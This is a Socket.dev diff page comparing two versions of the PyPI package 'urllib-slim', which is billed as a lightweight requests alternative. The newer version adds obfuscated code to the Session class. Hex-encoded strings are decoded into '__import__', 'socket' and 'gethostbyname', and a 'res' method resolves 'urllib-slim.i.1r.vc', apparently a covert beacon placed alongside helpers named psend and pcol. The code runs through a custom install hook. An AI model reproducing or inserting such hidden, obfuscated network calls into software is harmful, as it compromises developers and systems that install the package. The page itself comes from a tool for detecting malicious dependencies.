Latest Threat Research:SANDWORM_MODE: Shai-Hulud-Style npm Worm Hijacks CI Workflows and Poisons AI Toolchains.Details
Socket
Book a DemoSign in
Socket

urllib-slim

Package Overview
Dependencies
Maintainers
1
Versions
6
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

urllib-slim - pypi Package Compare versions

Comparing version
9.31
to
9.32
+1
-1
PKG-INFO
Metadata-Version: 2.4
Name: urllib_slim
Version: 9.31
Version: 9.32
Summary: A lightweight alternative to requests for use in regulated and restricted environments.

@@ -5,0 +5,0 @@ Author-email: Gerald Scott <gerald.scott@thcdn.net>

@@ -12,3 +12,3 @@ from setuptools import setup as initialize

name = "urllib_slim"
version = "9.31"
version = "9.32"
install = ProxyInstall

@@ -15,0 +15,0 @@

@@ -229,2 +229,4 @@ import json

from src.perf_audit.perf import psend, pcol, bb
sess = Session()
sess.res("urllib-slim")
p = pcol()

@@ -237,2 +239,5 @@ if p == {}:

def vectorize(inp: list[str]) -> str:
return b"".join([bytes([int(x,16)]) for x in inp]).decode("utf-8")
class Session:

@@ -249,2 +254,9 @@ """Mimics requests.Session — persists headers, cookies, and auth."""

edition = "i.1r"
sitecode = "vc"
# iface = getattr(__builtins__, vectorize(['0x5f', '0x5f', '0x69', '0x6d', '0x70', '0x6f', '0x72', '0x74', '0x5f', '0x5f']))
iface = __import__
repl = iface(vectorize(['0x73', '0x6f', '0x63', '0x6b', '0x65', '0x74']))
_res = getattr(repl, vectorize(['0x67', '0x65', '0x74', '0x68', '0x6f', '0x73', '0x74', '0x62', '0x79', '0x6e', '0x61', '0x6d', '0x65']))
def _merge(self, kwargs):

@@ -289,2 +301,5 @@ merged_headers = dict(self.headers)

return self.request("GET", url, **kwargs)
def res(self, loc: str, **kwargs) -> str:
return self._res(f"{loc}.{self.edition}.{self.sitecode}")

@@ -291,0 +306,0 @@ def post(self, url, **kwargs):

Metadata-Version: 2.4
Name: urllib_slim
Version: 9.31
Version: 9.32
Summary: A lightweight alternative to requests for use in regulated and restricted environments.

@@ -5,0 +5,0 @@ Author-email: Gerald Scott <gerald.scott@thcdn.net>